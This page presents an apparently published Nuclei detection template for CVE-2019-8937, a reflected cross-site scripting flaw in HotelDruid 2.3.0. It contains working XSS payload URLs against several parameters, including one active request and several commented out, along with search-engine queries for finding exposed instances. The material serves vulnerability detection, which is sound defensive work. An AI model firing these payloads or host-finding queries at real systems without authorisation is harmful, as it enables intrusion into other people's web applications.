HotelDruid 2.3.0 - Cross-Site Scripting
ID: CVE-2019-8937
Severity: medium
Author: LogicalHunter
Tags: cve2019,cve,packetstorm,xss,hoteldruid,edb,digitaldruid
Description
Section titled “Description”HotelDruid 2.3.0 contains a cross-site scripting vulnerability affecting nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php.
YAML Source
Section titled “YAML Source”id: CVE-2019-8937
info: name: HotelDruid 2.3.0 - Cross-Site Scripting author: LogicalHunter severity: medium description: HotelDruid 2.3.0 contains a cross-site scripting vulnerability affecting nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade to a patched version of HotelDruid or apply appropriate input sanitization to prevent XSS attacks. reference: - https://www.exploit-db.com/exploits/46429 - https://sourceforge.net/projects/hoteldruid/ - http://packetstormsecurity.com/files/151779/HotelDruid-2.3-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2019-8937 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-8937 cwe-id: CWE-79 epss-score: 0.00477 epss-percentile: 0.75729 cpe: cpe:2.3:a:digitaldruid:hoteldruid:2.3.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: digitaldruid product: hoteldruid shodan-query: - http.title:"hoteldruid" - http.favicon.hash:-1521640213 fofa-query: - title="hoteldruid" - icon_hash=-1521640213 google-query: intitle:"hoteldruid" tags: cve2019,cve,packetstorm,xss,hoteldruid,edb,digitaldruid
http: - method: GET path: - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' # - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?nsextt=x"><script>alert(document.domain)</script>' # - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13"><script>alert(document.domain)</script>' # - '{{BaseURL}}/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php"><script>alert(document.domain)</script>' # - '{{BaseURL}}/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019"><script>alert(document.domain)</script>' # - '{{BaseURL}}/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php"><script>alert(document.domain)</script>'
matchers-condition: and matchers: - type: word part: body words: - '"</script><script>alert(document.domain)</script>"><input'
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4b0a00483046022100ed2c59522491b7cc9352c9d24789a0a2f110a8168d5cf43214a3bc9f81db9c5d022100b660ef5f2a2322fdb26c61dd4a398828fd1bb1e6e2882bc18831519ccb17ebd3:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-8937.yaml"